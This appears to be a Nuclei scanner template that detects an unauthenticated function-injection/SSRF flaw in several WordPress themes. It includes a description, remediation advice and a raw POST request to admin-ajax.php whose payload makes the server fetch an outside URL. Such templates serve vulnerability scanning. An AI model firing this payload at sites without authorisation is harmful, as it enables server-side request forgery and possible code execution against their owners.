id: wp-multiple-theme-ssrf
info:
  name: WordPress Multiple Themes - Unauthenticated Function Injection
  author:
  - l0ne1y
  tags:
  - wordpress
  - rce
  - ssrf
  description: |-
    WordPress Themes Multiple Server Request Forgery Vulnerability
    WordPress is a blogging platform developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an open source application plug-in for WordPress.

    There is a code issue vulnerability in WordPress Multiple Themes. The vulnerability is caused by the plug-in not validating the action parameter in the /wp-admin/admin-ajax.php operation.
  reference:
  - https://www.exploit-db.com/exploits/49327
  - https://wpscan.com/vulnerability/10417
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.com/zh-cn/themes

    Temporary fix:
    1. Filter the response of the intranet server to the request of the public network server. If the web application obtains files of a certain type, it should first verify whether the returned information meets the file type standards before displaying the returned results to the user. For example, the returned information should be pictures. If the returned information is HTML, stop returning the returned information to the client.
    2. Unify the error prompt information to prevent users from judging the port status of the remote server based on the error information.
    3. On the firewall of the intranet server, limit the request port of the public network server to the common ports of HTTP and other protocols, such as: 80, 443, 8080, 8090.
    4. If there is no business communication between the intranet IP of the public network server and the intranet, it is recommended to blacklist the intranet IP corresponding to the public network server to prevent applications from being used to obtain intranet data.
    5. The intranet server disables unnecessary protocols and only allows HTTP and HTTPS requests to prevent security issues caused by protocols such as file:///, gopher://, ftp://, etc.
requests:
- matchers:
  - type: word
    part: body
    words:
    - Example Domain
    - protocol_version
  - type: status
    status:
    - 200
  matchers-condition: and
  raw:
  - |
    POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8

    action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com
